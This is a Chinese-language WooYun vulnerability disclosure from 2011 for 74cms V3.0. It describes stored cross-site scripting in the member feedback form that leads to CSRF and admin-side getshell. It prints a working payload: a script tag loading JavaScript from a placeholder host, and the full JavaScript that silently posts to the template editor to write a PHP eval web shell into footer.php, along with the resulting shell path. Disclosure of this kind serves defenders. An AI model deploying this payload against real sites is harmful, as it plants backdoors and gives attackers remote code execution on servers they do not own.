当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2011-03071

漏洞标题:骑士CMS(74cms) CSRF 后台 getshell

相关厂商:骑士CMS(74cms)

漏洞作者: 路人甲

提交时间:2011-10-21 19:16

修复时间:2011-10-21 20:27

公开时间:2011-10-21 20:27

漏洞类型:CSRF

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2011-10-21: 积极联系厂商并且等待厂商认领中,细节不对外公开
2011-10-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

详细说明:

官方网站:http://www.74cms.com/
影响版本:74cms V3.0.20110908
Author:insight
漏洞详细:
注册用户-->会员中心-->意见建议-->提交意见内容 1">1<script src="http://xxx.com/x.js"></script>1 --> 等待管理员登录
管理员登录-->查看 "待回复的意见/建议" --> .....
js内容:
var Shelldata='tpl_content=%3C%3Fphp%20eval%28%24_POST%5Bxdxd%5D%29%3F%3E&tpl_dir=default&tpl_name=footer.php&del_Submit=%B1%A3%B4%E6'; try{ var xml = window.XMLHttpRequest ? (new XMLHttpRequest()) : (new ActiveXObject('Microsoft.XMLHTTP')); xml.open("POST",'admin_templates.php?act=do_edit',false); xml.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded'); xml.onreadystatechange = function(){if(xml.readyState == 4){}}; xml.send(Shelldata); }catch(e){}
shell地址:http://site.com/74cmsv3/templates/default/footer.php

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝